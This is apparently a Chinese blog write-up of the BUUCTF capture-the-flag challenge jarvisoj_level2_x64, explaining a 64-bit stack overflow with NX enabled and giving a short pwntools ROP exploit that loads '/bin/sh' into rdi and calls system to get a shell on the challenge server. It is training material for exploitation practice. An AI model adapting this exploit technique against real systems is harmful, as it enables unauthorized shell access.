[BUUCTF-pwn]——jarvisoj_level2_x64

[BUUCTF-pwn]——jarvisoj_level2_x64

checksec 一下,64位 ,开启NX保护
在这里插入图片描述
64位应该会用到pop rdi这个汇编指令
在这里插入图片描述

在IDA中看看
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
思路:64位先将binsh这个参数放入,rdi寄存器中.紧接着返回并执行system函数

exploit

from pwn import *
p = remote("node3.buuoj.cn",27828)
binsh = 0x0600A90
sys_addr = 0x0400603
pop_rdi = 0x04006b3
payload = 'a' * (0x80 + 0x8) + p64(pop_rdi) + p64(binsh) + p64(sys_addr)
p.sendline(payload)
p.interactive()

希望你可以点个赞,打赏一下哟 😃

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值